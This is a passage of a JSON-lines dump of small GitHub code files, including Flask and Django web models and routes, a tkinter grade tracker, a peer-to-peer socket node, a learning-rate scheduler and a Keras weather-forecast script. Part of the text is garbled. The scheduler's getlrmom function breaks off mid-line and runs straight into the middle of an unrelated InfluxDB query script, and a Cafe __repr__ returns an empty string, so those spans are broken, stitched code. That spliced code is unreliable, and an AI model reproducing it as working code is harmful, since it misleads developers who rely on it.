password,\n description,\n first_name,\n last_name,\n email,\n image_url=DEFAULT_IMG_URL,\n admin=False,\n ):\n \"\"\"Sign up user.\n\n Hashes password and adds user to system.\n \"\"\"\n\n hashed_pwd = bcrypt.generate_password_hash(password).decode(\"UTF-8\")\n user = User(\n username=username,\n password=hashed_pwd,\n first_name=first_name,\n last_name=last_name,\n email=email,\n image_url=image_url,\n description=description,\n admin=admin,\n )\n db.session.add(user)\n return user\n\n @classmethod\n def authenticate(cls, username, password):\n \"\"\"Find user with `username` and `password`.\n\n This is a class method (call it on the class, not an individual user.)\n It searches for a user whose password hash matches this password\n and, if it finds such a user, returns that user object.\n\n If this can't find matching user (or if password is wrong), returns\n False.\n \"\"\"\n\n user = cls.query.filter_by(username=username).first()\n\n if user:\n is_auth = bcrypt.check_password_hash(user.password, password)\n if is_auth:\n return user\n\n return False\n\n\nclass City(db.Model):\n \"\"\"Cities for cafes.\"\"\"\n\n __tablename__ = \"cities\"\n\n code = db.Column(\n db.Text,\n primary_key=True,\n )\n\n name = db.Column(\n db.Text,\n nullable=False,\n )\n\n state = db.Column(\n db.String(2),\n nullable=False,\n )\n\n\nclass Cafe(db.Model):\n \"\"\"Cafe information.\"\"\"\n\n __tablename__ = \"cafes\"\n\n id = db.Column(\n db.Integer,\n primary_key=True,\n )\n\n name = db.Column(\n db.Text,\n nullable=False,\n )\n\n description = db.Column(\n db.Text,\n nullable=False,\n )\n\n url = db.Column(\n db.Text,\n nullable=False,\n )\n\n address = db.Column(\n db.Text,\n nullable=False,\n )\n\n city_code = db.Column(\n db.Text,\n db.ForeignKey(\"cities.code\"),\n nullable=False,\n )\n\n image_url = db.Column(\n db.Text,\n nullable=False,\n default=\"/static/images/default-cafe.jpg\",\n )\n\n city = db.relationship(\"City\", backref=\"cafes\")\n\n def __repr__(self):\n return f''\n\n def get_city_state(self):\n \"\"\"Return 'city, state' for cafe.\"\"\"\n\n city = self.city\n return f\"{city.name}, {city.state}\"\n\n\ndef connect_db(app):\n \"\"\"Connect this database to provided Flask app.\n\n You should call this in your Flask app.\n \"\"\"\n\n app.app_context().push()\n db.app = app\n db.init_app(app)\n","repo_name":"danielzeljko/flask-cafe","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"23577319535","text":"import json\n\n\ndef hello(event, context):\n data = json.loads(event['body'])\n\n print(type(data))\n print(data)\n\n body = {\n \"type\": type(data).__name__,\n \"data\": data\n }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body)\n }\n\n return response\n","repo_name":"fbaltor/principia-challenge","sub_path":"api/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"6344345547","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\nimport sqlite3\r\n\r\ndef criar_tabela():\r\n conn = sqlite3.connect('escola.db')\r\n c = conn.cursor()\r\n\r\n c.execute('''CREATE TABLE IF NOT EXISTS alunos (\r\n id INTEGER PRIMARY KEY,\r\n nome TEXT,\r\n presencas INTEGER,\r\n faltas INTEGER,\r\n nota1 REAL,\r\n nota2 REAL,\r\n media REAL,\r\n frequencia REAL\r\n )''')\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\ndef calcular_situacao(media, frequencia):\r\n if media >= 6.0 and frequencia >= 75:\r\n return \"Aprovado\"\r\n else:\r\n return \"Reprovado\"\r\n\r\ndef adicionar_aluno():\r\n nome = nome_entry.get()\r\n presencas = int(presencas_entry.get())\r\n faltas = int(faltas_entry.get())\r\n nota1 = float(nota1_entry.get())\r\n nota2 = float(nota2_entry.get())\r\n\r\n conn = sqlite3.connect('escola.db')\r\n c = conn.cursor()\r\n\r\n media = (nota1 + nota2) / 2\r\n total_aulas = presencas + faltas\r\n frequencia = (presencas / total_aulas) * 100\r\n\r\n situacao = calcular_situacao(media, frequencia)\r\n\r\n c.execute(\"INSERT INTO alunos (nome, presencas, faltas, nota1, nota2, media, frequencia) VALUES (?, ?, ?, ?, ?, ?, ?)\",\r\n (nome, presencas, faltas, nota1, nota2, media, frequencia))\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n messagebox.showinfo(\"Sucesso\", f\"Aluno {nome} adicionado com sucesso. Situação: {situacao}\")\r\n\r\n# Cria a janela principal\r\nroot = tk.Tk()\r\nroot.title(\"Controle de Alunos\")\r\n\r\n# Cria os widgets da interface\r\nnome_label = tk.Label(root, text=\"Nome:\")\r\nnome_label.pack()\r\nnome_entry = tk.Entry(root)\r\nnome_entry.pack()\r\n\r\npresencas_label = tk.Label(root, text=\"Presenças:\")\r\npresencas_label.pack()\r\npresencas_entry = tk.Entry(root)\r\npresencas_entry.pack()\r\n\r\nfaltas_label = tk.Label(root, text=\"Faltas:\")\r\nfaltas_label.pack()\r\nfaltas_entry = tk.Entry(root)\r\nfaltas_entry.pack()\r\n\r\nnota1_label = tk.Label(root, text=\"Nota 1:\")\r\nnota1_label.pack()\r\nnota1_entry = tk.Entry(root)\r\nnota1_entry.pack()\r\n\r\nnota2_label = tk.Label(root, text=\"Nota 2:\")\r\nnota2_label.pack()\r\nnota2_entry = tk.Entry(root)\r\nnota2_entry.pack()\r\n\r\nadicionar_button = tk.Button(root, text=\"Adicionar Aluno\", command=adicionar_aluno)\r\nadicionar_button.pack()\r\n\r\nif __name__ == \"__main__\":\r\n criar_tabela()\r\n root.mainloop()\r\n","repo_name":"dbcfilho/average_database","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"18378421100","text":"import numpy as np\nimport math\nimport tensorflow.compat.v1 as tf\n\nclass CosineAnnealer:\n\n def __init__(self, start, end, steps):\n self.start = start\n self.end = end\n self.steps = steps\n self.n = 0\n\n def step(self):\n self.n += 1\n cos = tf.math.cos(np.pi * (self.n / self.steps)) + 1\n return self.end + (self.start - self.end) / 2. * cos\n\n def getval(self,step):\n cos = tf.math.cos(np.pi * (step / self.steps)) + 1\n return self.end + (self.start - self.end) / 2. * cos\n\nclass OneCycleScheduler():\n \"\"\"\n From https://www.avanwyk.com/tensorflow-2-super-convergence-with-the-1cycle-policy/, by Andrich van Wyk modified from\n fastai lib. Modified again to apply for TPU code.\n \"\"\"\n\n def __init__(self, lr_max, steps, mom_min=0.85, mom_max=0.95, phase_1_pct=0.45, div_factor=25.):\n super(OneCycleScheduler, self).__init__()\n lr_min = lr_max / div_factor\n final_lr = lr_max / (div_factor * 1e4)\n phase_1_steps = steps * phase_1_pct\n phase_2_steps = steps - phase_1_steps\n\n self.phase_1_steps = phase_1_steps\n self.phase_2_steps = phase_2_steps\n self.phase = 0\n self.step = 0\n\n self.phases = [[CosineAnnealer(lr_min, lr_max, phase_1_steps), CosineAnnealer(mom_max, mom_min, phase_1_steps)],\n [CosineAnnealer(lr_max, final_lr, phase_2_steps),\n CosineAnnealer(mom_min, mom_max, phase_2_steps)]]\n\n self.lrs = []\n self.moms = []\n\n @tf.function\n def getlrmom(self,step):\n if step= {0} - 22d AND time < {0} GROUP BY time(1h)'.format(date)) # Query written in InfluxQL\n points = results.get_points()\n values = results.raw[\"series\"][0][\"values\"]\n columns = results.raw[\"series\"][0][\"columns\"]\n df = pd.DataFrame(values, columns=columns)\n df.index = [parser.parse(d) for d in df[\"time\"].values]\n split_time = df.index[-1]-td(days=1)\n\n train = df.loc[:split_time]\n test = df.loc[split_time+td(seconds=1):]\n train_x, train_y = split_labels(train)\n test_x, test_y = split_labels(test)\n return train_x, train_y, test_x, test_y\n\n\ndef split_labels(df):\n x = df[[\"time\"]].rename(columns={\"time\": \"Time\"})\n y = df[[\"mean\"]].rename(columns={\"mean\": \"Demand\"})\n x.index = list(range(len(x)))\n y.index = list(range(len(y)))\n return x,y\n\n\nif __name__ == \"__main__\":\n train_x, train_y, test_x, test_y = get_train_test(date=\"2020-03-01\")\n print(train_x,train_y) \n\n","repo_name":"NielsOerbaek/caiso-mlflow","sub_path":"prepros.py","file_name":"prepros.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"}
+{"seq_id":"3709630522","text":"import hashlib\nimport ipaddress\nimport json\nimport socket\nimport sys\nimport threading\nimport time\nimport uuid\n\nfrom . import crypto_funcs as cf\n\nmsg_del_time = 30\nPORT = 65432\n\n\nclass NodeConnection(threading.Thread):\n def __init__(self, main_node, sock, id, host, port):\n\n super(NodeConnection, self).__init__()\n\n self.host = host\n self.port = port\n self.main_node = main_node\n self.sock = sock\n self.terminate_flag = threading.Event()\n self.last_ping = time.time()\n # Variable for parsing the incoming json messages\n self.buffer = \"\"\n\n # The id of the connected node\n self.public_key = cf.load_key(id)\n self.id = id\n\n self.main_node.debug_print(\"Connection \" + self.host + \":\" + str(self.port))\n\n def send(self, data):\n try:\n self.sock.sendall(data.encode(\"utf-8\"))\n\n except Exception as e:\n self.main_node.debug_print(\"Exception: \" + str(e))\n self.terminate_flag.set()\n\n def stop(self):\n self.terminate_flag.set()\n\n def run(self):\n self.sock.settimeout(10.0)\n\n while not self.terminate_flag.is_set():\n if time.time() - self.last_ping > self.main_node.dead_time:\n self.terminate_flag.set()\n print(\"node\" + self.id + \" is dead\")\n\n try:\n message = self.sock.recv(4096)\n if message == \"ping\":\n self.last_ping = time.time()\n else:\n self.main_node.node_message(self, message)\n\n except socket.timeout:\n pass\n\n except Exception as e:\n self.terminate_flag.set()\n self.main_node.debug_print(e)\n\n time.sleep(0.01)\n\n self.main_node.node_disconnected(self)\n self.sock.settimeout(None)\n self.sock.close()\n del self.main_node.nodes_connected[self.main_node.nodes_connected.index(self)]\n time.sleep(1)\n\n\nclass Node(threading.Thread):\n def __init__(self, host=\"\", port=65432):\n super(Node, self).__init__()\n\n self.terminate_flag = threading.Event()\n self.pinger = Pinger(self) # start pinger\n self.debug = True\n\n self.dead_time = 45 # time to disconect from node if not pinged, nodes ping after 20s\n\n self.host = host\n self.ip = host # own ip, will be changed by connection later\n self.port = port\n\n self.nodes_connected = []\n\n self.msgs = {} # hashes of recieved messages\n self.peers = []\n\n self.id = uuid.uuid4()\n\n self.max_peers = 10\n\n hostname = socket.gethostname()\n\n self.local_ip = socket.gethostbyname(hostname)\n\n self.banned = []\n\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.debug_print(\"Initialisation of the Node on port: \" + str(self.port))\n self.sock.bind((self.host, self.port))\n self.sock.settimeout(10.0)\n self.sock.listen(1)\n\n def debug_print(self, msg):\n if self.debug:\n print(\"[debug] \" + str(msg))\n\n def network_send(self, message, exc=[]):\n for i in self.nodes_connected:\n if i.host not in exc:\n i.send(json.dumps(message))\n\n def connect_to(self, host, port=PORT):\n\n if not self.check_ip_to_connect(host):\n self.debug_print(\"connect_to: Cannot connect!!\")\n return False\n\n if len(self.nodes_connected) >= self.max_peers:\n self.debug_print(\"Peers limit reached.\")\n return True\n\n for node in self.nodes_connected:\n if node.host == host:\n print(\"[connect_to]: Already connected with this node.\")\n return True\n\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((host, port))\n\n sock.send(self.id.encode(\"utf-8\"))\n connected_node_id = sock.recv(1024).decode(\"utf-8\")\n\n if self.id == connected_node_id:\n self.debug_print(\"Possible own ip: \" + host)\n if ipaddress.ip_address(host).is_private:\n self.local_ip = host\n else:\n self.ip = host\n self.banned.append(host)\n sock.close()\n return False\n\n thread_client = self.create_new_connection(sock, connected_node_id, host, port)\n thread_client.start()\n self.nodes_connected.append(thread_client)\n self.node_connected(thread_client)\n\n except Exception as e:\n self.debug_print(\"connect_to: Could not connect with node. (\" + str(e) + \")\")\n\n def create_new_connection(self, connection, id, host, port):\n return NodeConnection(self, connection, id, host, port)\n\n def stop(self):\n self.terminate_flag.set()\n\n def run(self):\n self.pinger.start()\n while not self.terminate_flag.is_set():\n try:\n connection, client_address = self.sock.accept()\n\n connected_node_id = connection.recv(2048).decode(\"utf-8\")\n connection.send(self.id.encode(\"utf-8\"))\n\n if self.id != connected_node_id:\n thread_client = self.create_new_connection(\n connection,\n connected_node_id,\n client_address[0],\n client_address[1],\n )\n thread_client.start()\n\n self.nodes_connected.append(thread_client)\n\n self.node_connected(thread_client)\n\n else:\n connection.close()\n\n except socket.timeout:\n pass\n\n except Exception as e:\n raise e\n\n time.sleep(0.01)\n\n self.pinger.stop()\n for t in self.nodes_connected:\n t.stop()\n\n self.sock.close()\n print(\"Node stopped\")\n\n def ConnectToNodes(self):\n for i in self.peers:\n if not self.connect_to(i, PORT):\n # delete wrong / own ip from peers\n del self.peers[self.peers.index(i)]\n\n def message(self, type, data, ex=[]):\n # time that the message was sent\n dict = {\"type\": type, \"data\": data}\n if \"time\" not in dict:\n dict[\"time\"] = str(time.time())\n\n self.network_send(dict, ex)\n\n def send_peers(self):\n self.message(\"peers\", self.peers)\n\n def check_validity(self, msg):\n if not (\"time\" in msg and \"type\" in msg and \"data\" in msg):\n return False\n\n return True\n\n def check_expired(self, dta):\n sth = str(dta)\n msghash = hashlib.md5(sth.encode(\"utf-8\")).hexdigest().decode()\n\n if float(time.time()) - float(dta[\"time\"]) < float(msg_del_time):\n if msghash not in self.msgs:\n self.msgs[msghash] = time.time()\n return False\n else:\n # if message is expired\n self.debug_print(\"expired:\" + dta[\"msg\"])\n return True\n\n def announce(self, dta, n):\n self.message(dta[\"type\"], dta[\"data\"], dta, ex=n)\n if len(self.msgs) > len(self.peers) * 20:\n for i in self.msgs.copy():\n if time.time() - self.msgs[i] > msg_del_time:\n del self.msgs[i]\n\n def data_handler(self, dta, n):\n if self.check_expired(dta):\n return False\n else:\n self.announce(dta, n)\n\n type = dta[\"type\"]\n data = dta[\"data\"]\n\n if type == \"peers\":\n # peers handling\n for i in data:\n if self.check_ip_to_connect(i):\n self.peers.append(i)\n\n self.debug_print(\"Known Peers: \" + str(self.peers))\n self.ConnectToNodes() # cpnnect to new nodes\n return True\n\n else:\n self.on_message(dta)\n\n def check_ip_to_connect(self, ip):\n if (\n ip not in self.peers\n and ip != \"\"\n and ip != self.ip\n and ip != self.local_ip\n and ip not in self.banned\n ):\n return True\n else:\n return False\n\n def on_message(self, data):\n self.debug_print(\"Incomig Message: \" + data)\n\n def on_connect(self, n):\n pass\n\n def loadstate(self, file=\"state.json\"):\n with open(file, \"r\") as f:\n peers = json.load(f)\n for i in peers:\n self.connect_to(i)\n\n def savestate(self, file=\"state.json\"):\n with open(file, \"w+\") as f:\n json.dump(self.peers, f)\n\n def node_connected(self, node):\n self.debug_print(\"node_connected: \" + node.id)\n if node.host not in self.peers:\n self.peers.append(node.host)\n self.send_peers()\n self.on_connect(node)\n\n def node_disconnected(self, node):\n self.debug_print(\"node_disconnected: \" + node.id)\n if node.host in self.peers:\n self.peers.remove(node.host)\n\n def node_message(self, node, data):\n try:\n json.loads(data)\n except json.decoder.JSONDecodeError:\n self.debug_print(f\"Error loading message from {node.id}\")\n return\n self.data_handler(json.loads(data), [node.host, self.ip])\n\n\nclass Pinger(threading.Thread):\n def __init__(self, parent):\n self.terminate_flag = threading.Event()\n super(Pinger, self).__init__()\n self.parent = parent\n self.dead_time = 30 # time to disconect from node if not pinged\n\n def stop(self):\n self.terminate_flag.set()\n\n def run(self):\n print(\"Pinger Started\")\n while not self.terminate_flag.is_set(): # Check whether the thread needs to be closed\n for i in self.parent.nodes_connected:\n i.send(\"ping\")\n time.sleep(20)\n print(\"Pinger stopped\")\n","repo_name":"GianisTsol/cryptocoin","sub_path":"cryptocoin/p2pbase.py","file_name":"p2pbase.py","file_ext":"py","file_size_in_byte":10066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"2285574018","text":"#!/usr/bin/env python\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm, ListedColormap,BoundaryNorm\n\nimport numpy as np\nimport datetime as dt\nimport os, pickle\nfrom scipy.ndimage.filters import gaussian_filter\nfrom scipy.stats import pearsonr\nimport pandas as pd\nfrom mpl_toolkits.basemap import *\nfrom sklearn.calibration import CalibratedClassifierCV, calibration_curve\nfrom sklearn import metrics\nfrom keras.models import Model, model_from_json, save_model, load_model\nfrom keras.layers import Dense, Activation, Conv2D, Input, AveragePooling2D, Flatten, LeakyReLU\nfrom keras.layers import Dropout, BatchNormalization\nfrom keras.regularizers import l2\nfrom keras.optimizers import SGD, Adam\nimport keras.backend as K\nimport tensorflow as tf\n\ndef computeSTP(row):\n lclterm = ((2000.0-row['MLLCL-potential_mean'])/1000.0)\n lclterm = np.where(row['MLLCL-potential_mean']<1000, 1.0, lclterm)\n lclterm = np.where(row['MLLCL-potential_mean']>2000, 0.0, lclterm)\n\n shrterm = (row['shr06']/20.0)\n shrterm = np.where(row['shr06'] > 30, 1.5, shrterm)\n shrterm = np.where(row['shr06'] < 12.5, 0.0, shrterm)\n\n stp = (row['SBCAPE-potential_mean']/1500.0) * lclterm * (row['SRH01-potential_mean']/150.0) * shrterm\n return stp\n\ndef read_csv_files():\n # read in all CSV files for 1km forecasts\n tdate = sdate\n all_files = []\n while tdate <= edate:\n yyyymmdd = tdate.strftime('%Y%m%d')\n csv_file = '/glade/work/sobash/NSC_objects/grid_data_ncarstorm_3km_csv_preprocessed/grid_data_NCARSTORM_d01_%s-0000.csv.gz'%(yyyymmdd)\n\n if os.path.exists(csv_file): all_files.append(csv_file)\n tdate += dateinc\n print('Reading %s files'%(len(all_files)))\n\n df = pd.concat((pd.read_csv(f, compression='gzip') for f in all_files))\n\n #if model == 'NSC': df['stp'] = df.apply(computeSTP, axis=1) \n\n #if model == 'NSC': df['datetime'] = pd.to_datetime(df['Valid_Date'])\n #if model == 'NCAR':\n df['datetime'] = pd.to_datetime(df['Date'])\n #df['Run_Date'] = pd.to_datetime(df['Date']) - pd.to_timedelta(df['fhr'])\n df['year'] = df['datetime'].dt.year\n df['month'] = df['datetime'].dt.month\n df['hour'] = df['datetime'].dt.hour\n df['dayofyear'] = df['datetime'].dt.dayofyear\n return df, len(all_files)\n\ndef brier_score_keras(obs, preds):\n return K.mean((preds - obs) ** 2)\n\ndef brier_skill_score_keras(obs, preds):\n climo = K.mean((obs - K.mean(obs)) ** 2)\n bs = brier_score_keras(obs, preds)\n ratio = (bs / climo)\n return climo\n\ndef auc(obs, preds):\n auc = tf.metrics.auc(obs, preds)[1]\n K.get_session().run(tf.local_variables_initializer())\n return auc\n \ndef normalize_multivariate_data(data, scaling_values=None):\n \"\"\"\n Normalize each channel in the 4 dimensional data matrix independently.\n\n Args:\n data: 4-dimensional array with dimensions (example, y, x, channel/variable)\n scaling_values: pandas dataframe containing mean and std columns\n\n Returns:\n normalized data array, scaling_values\n \"\"\"\n print(data.shape, data.dtype)\n normed_data = np.zeros(data.shape, dtype=data.dtype)\n scale_cols = [\"mean\", \"std\"]\n if scaling_values is None:\n scaling_values = pd.DataFrame(np.zeros((data.shape[-1], len(scale_cols)), dtype=np.float32),\n columns=scale_cols)\n for i in range(data.shape[-1]): scaling_values.loc[i, [\"mean\", \"std\"]] = [data[:, i].mean(), data[:, i].std()]\n\n for i in range(data.shape[-1]):\n normed_data[:, i] = (data[:, i] - scaling_values.loc[i, \"mean\"]) / scaling_values.loc[i, \"std\"]\n\n return normed_data, scaling_values\n\ndef plot_forecast(predictions, prefix=\"\"):\n #test = readNCLcm('MPL_Greys')[25::] + [[1,1,1]] + readNCLcm('MPL_Reds')[10::]\n #test = readNCLcm('perc2_9lev')[1::]\n #cmap = ListedColormap(test)\n cmap = plt.get_cmap('RdGy_r')\n norm = BoundaryNorm(np.arange(0,1.1,0.1), ncolors=cmap.N, clip=True)\n\n print(predictions)\n\n #awips = Basemap(projection='lcc', llcrnrlon=-133.459, llcrnrlat=12.19, urcrnrlon=-49.38641, urcrnrlat=57.2894, lat_1=25.0, lat_2=25.0, lon_0=-95, resolution='l', area_thresh=10000.)\n\n #fig, axes, m = pickle.load(open('/glade/u/home/sobash/NSC_scripts/ch_pk_files/rt2015_ch_CONUS.pk', 'r'))\n #fig, axes, m = pickle.load(open('/glade/u/home/sobash/NSC_scripts/dav_pk_files/rt2015_ch_CONUS.pk', 'rb'))\n fig, axes, m = pickle.load(open('rt2015_ch_CONUS.pk', 'rb')) \n\n lats, lons = predictions['lat'].values, predictions['lon'].values\n x, y = m(lons, lats)\n\n # do something convoluted here to only plot each point once\n probmax = {}\n for i,p in enumerate(predictions['predict_proba'].values):\n thiskey = '%f%f'%(lats[i],lons[i])\n if thiskey in probmax:\n if p > probmax[thiskey]:\n probmax[thiskey] = p\n else:\n probmax[thiskey] = p\n\n for i,p in enumerate(predictions['predict_proba'].values):\n thiskey = '%f%f'%(lats[i],lons[i])\n thisvalue = probmax[thiskey]\n\n color = cmap(norm([thisvalue])[0])\n probmax[thiskey] = -999\n if thisvalue >= 0.05:\n a = plt.text(x[i], y[i], int(round(thisvalue*100)), fontsize=10, ha='center', va='center', family='monospace', color=color, fontweight='bold')\n #a = m.scatter(x, y, s=50, c=predictions['predict_proba'].values, lw=0.5, edgecolors='k', cmap=cmap, norm=norm)\n\n # ADD COLORBAR\n #cax = fig.add_axes([0.02,0.1,0.02,0.3])\n #cb = plt.colorbar(a, cax=cax, orientation='vertical', extendfrac=0.0)\n #cb.outline.set_linewidth(0.5)\n #cb.ax.tick_params(labelsize=10)\n\n plt.savefig('forecast%s.png'%prefix)\n\nsdate = dt.datetime(2012,6,29,0,0,0)\nedate = dt.datetime(2012,6,29,0,0,0)\ndateinc = dt.timedelta(days=1)\ndf, numfcsts = read_csv_files()\n\nprint('Training random forest classifier')\n\nfeatures = ['fhr', 'dayofyear', 'lat', 'lon', 'UP_HELI_MAX', 'UP_HELI_MAX03', 'UP_HELI_MAX01', 'W_UP_MAX', 'W_DN_MAX', 'WSPD10MAX', 'MUCAPE', 'SHR06', 'MLCINH', 'MLLCL', 'SHR01', 'SRH01', 'SRH03', 'T2', 'TD2', 'PSFC','CAPESHEAR', 'STP', 'LR75']\nlarge_scale_features = ['U925','U850','U700','U500','V925','V850','V700','V500','T925','T850','T700','T500','TD925','TD850','TD700','TD500']\nneighbor_features = [ f+'-%s1'%n for f in large_scale_features for n in ['E','S','N','W'] ]\nneighbor_time_features = [ f+'-%s'%n for f in ['STP', 'CAPESHEAR', 'MUCAPE', 'SBCINH', 'MLLCL', 'SHR06', 'SHR01'] for n in ['TP1', 'TM1'] ]\nfeatures = features + large_scale_features + neighbor_features + neighbor_time_features\n\n# normalize data we want to use\nscaling_values = pickle.load(open('scaling_values.pk', 'rb'))\n\nnorm_in_data, scaling_values = normalize_multivariate_data(df[features].values, scaling_values=scaling_values)\n\n# load combined architecture and weights\ndense_model = load_model('neural_network.h5', custom_objects={'brier_score_keras': brier_score_keras, 'brier_skill_score_keras':brier_skill_score_keras, 'auc':auc })\n\npredictions_proba = dense_model.predict(norm_in_data)\nprint(predictions_proba.max())\nprint(predictions_proba) \n\n#labels: all, wind, hailone, torn\ndf['predict_proba'] = predictions_proba[:,1]\nforecast_mask = (df['fhr'] > 12)\nplot_forecast(df[forecast_mask])\n","repo_name":"ahijevyc/machine-learning","sub_path":"neural_network_forecast_gridded.py","file_name":"neural_network_forecast_gridded.py","file_ext":"py","file_size_in_byte":7303,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"}
+{"seq_id":"9224681880","text":"import sys\n\ndef main():\n\tif len(sys.argv) > 1:\n\t\tfor i in range(1,len(sys.argv)):\n\t\t\tfilename = sys.argv[i]\n\t\t\tfile = open (filename, \"r\")\n\t\t\tcontent = file.read()\n\t\t\tprint (content)\n\t\t\tfile.close()\n\telse:\n\t\treturn \"Please enter a file\"\n\nif __name__ == '__main__':\n\tprint(main())\n","repo_name":"nsapundzhiev/HackBG","sub_path":"week2/ 2-File-System-Problems/cat2.py","file_name":"cat2.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"29781769565","text":"from django.urls import path, include\nfrom django.conf import settings\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom rest_framework import routers\n\nfrom .views import (index, admin, avatar, login_api, user_data_api, csrf_api, basic_medium_metadata,\n responsible_ticket_metadata, responsible_metadata, basic_medium_without_certificate_metadata,\n roles_metadata, generate_fixtures)\nfrom .api import (UserViewSet, BasicMediumExpedientViewSet, RequestTicketViewSet,\n MovementTicketViewSet, ResponsibilityCertificateViewSet)\n\n\n# Incluyo el enrutador de los ViewSet declarados para el API\nrouter = routers.SimpleRouter()\nrouter.register(r'users', UserViewSet)\nrouter.register(r'basic_medium', BasicMediumExpedientViewSet)\nrouter.register(r'request_ticket', RequestTicketViewSet)\nrouter.register(r'movement_ticket', MovementTicketViewSet)\nrouter.register(r'responsibility_certificate', ResponsibilityCertificateViewSet)\n\nurlpatterns = [\n # Default System urls\n path('', index, name='index'),\n path('admin/', admin, name='dashboard'),\n\n # Authentication urls\n path('login/', LoginView.as_view(), name='login'),\n path('logout/', LogoutView.as_view(), name='logout'),\n\n # API urls\n path('api/login/', login_api, name='api_login'),\n path('api/avatar/', avatar, name=\"avatar\"),\n path('api/csrf/', csrf_api, name=\"csrf_api\"),\n path('api/user/', user_data_api, name=\"user_data\"),\n path('api/responsible/', responsible_metadata, name='responsible_list'),\n path('api/responsible_ticket/', responsible_ticket_metadata, name='responsible_ticket_list'),\n path('api/roles/', roles_metadata, name='roles_list'),\n path('api/mediums/', basic_medium_metadata, name='basic_medium_list'),\n path('api/mediums_certificate/', basic_medium_without_certificate_metadata, name='basic_medium_certificate_list'),\n path('api/', include(router.urls)),\n]\n\n# This is required for static files while in development mode. (DEBUG=TRUE)\nif settings.DEBUG:\n urlpatterns += [path('fixtures/', generate_fixtures)]\n","repo_name":"ISW-P5/Gestion-Medios-Basicos","sub_path":"system/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"16298642126","text":"from fastapi import APIRouter, HTTPException\nfrom automart.models import VehicleMake, VehicleModel\nfrom automart.schemas import VehicleMakeView, VehicleModelView\nfrom automart.lib.nhtsa import fetch_make_models\n\nrouter = APIRouter(\n prefix=\"/vehicle-make\",\n tags=[\"Vehicle Makes\"],\n)\n\n\n@router.get(\"/\", response_model=list[VehicleMakeView])\nasync def get_vehicle_makes(page: int = 0, perPage: int = 25):\n query = VehicleMake.select().limit(perPage).offset(page * perPage)\n vehicle_makes = [VehicleMakeView.from_orm(vehicle_makes) for vehicle_makes in query]\n return vehicle_makes\n\n\n@router.get(\"/{make_id}\", response_model=None)\nasync def get_vehicle_make(vehicle_make_id: int):\n vehicle_make = VehicleMake.get_by_id(vehicle_make_id)\n\n if not vehicle_make:\n raise HTTPException(status_code=404)\n\n return VehicleMakeView.from_orm(vehicle_make)\n\n\n@router.get(\"/{make_id}/models\", response_model=list[VehicleModelView])\nasync def get_vehicle_models_by_make(vehicle_make_id: int):\n query = (\n VehicleModel.select().where(VehicleMake.id == vehicle_make_id).join(VehicleMake)\n )\n vehicle_makes = [\n VehicleModelView.from_orm(vehicle_makes) for vehicle_makes in query\n ]\n return vehicle_makes\n","repo_name":"jloiola/automart","sub_path":"automart/routes/vehicle_make.py","file_name":"vehicle_make.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"8359123435","text":"print(\"\\nCalculate the Greatest Common Divisor of two Integers: \\n\")\na = int(input(\"Enter first integer: \"))\nb = int(input(\"Enter second integer: \"))\nx, y = a, b\nif a == 0:\n gcd = 0 #I didn't know that 0 could be considered as a divisor,\n #the logic behind this if statement from the pseudo-algorithm is unclear\nelse:\n while b != 0:\n if a > b:\n a = a - b\n else:\n b = b - a\n gcd = a\n\nprint(\"\\ngcd(\"+ str(x)+ \", \"+ str(y)+\") = \" +str(gcd))\n\n","repo_name":"dankodak/Programmierkurs","sub_path":"Abgaben/Blatt 2/Aufgabe 2/Team 42164/Ben Romdhane_Houssem_HoussemBenRomdhane_755653/Ueb2_Auf2_HoussemBenRomdhane.py","file_name":"Ueb2_Auf2_HoussemBenRomdhane.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
